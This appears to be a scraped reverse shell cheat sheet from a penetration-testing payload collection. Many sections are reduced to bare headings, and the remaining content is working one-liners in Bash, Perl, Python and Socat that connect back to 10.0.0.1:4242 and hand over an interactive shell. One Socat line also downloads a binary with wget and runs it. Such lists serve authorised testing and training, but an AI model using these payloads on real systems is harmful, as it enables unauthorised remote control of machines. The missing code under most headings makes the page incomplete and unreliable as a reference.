Reverse Shell Cheat Sheet
Summary
Tools
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1
Bash UDP
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1
Listener: nc -u -lvp 4242
C
Socat
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
Telnet
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python
Ruby
IPv4
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Socat
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
Telnet
python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
War
Meterpreter Shell
IPv6
Windows Staged reverse TCP
Windows Stageless reverse TCP
Linux Staged reverse TCP
Linux Stageless reverse TCP
PHP
Ruby
Golang
Netcat Traditional
Netcat OpenBSD
Netcat BusyBox
Ncat
OpenSSL
Attacker:
Perl
Powershell
Awk
Java
Java Alternative 1
Java Alternative 2
Java: This is more stealthy
Telnet
War
Lua
Ruby
Socat
Telnet
Nodejs
Groovy
Java Alternative 1
Groovy Alternative 1
Java: This is more stealthy
C
Lua
Ncat
Dart
Meterpreter Shell
Windows Staged reverse TCP
Windows Stageless reverse TCP
Linux Staged reverse TCP
Linux Stageless reverse TCP
Other platforms
SPAWN TTY SHELL
References
Reverse Shell Generator - Hosted reverse shell generator (Source)
Revshellgen - CLI reverse shell generator
Don't forget to check with other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
A static socat binary can be found at //github.com/andrew-d/static-binaries
Linux only
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
- IPv4 (no spaces)
- IPv4 (no spaces, shortened)
- IPv4 (no spaces, shortened further)
IPv6 (no spaces)
IPv6 (no spaces, shortened)
Windows only (Python2)
Windows only (Python3)
TLS-PSK (does not rely on PKI or self-signed certificates)
Note: this is more stealthy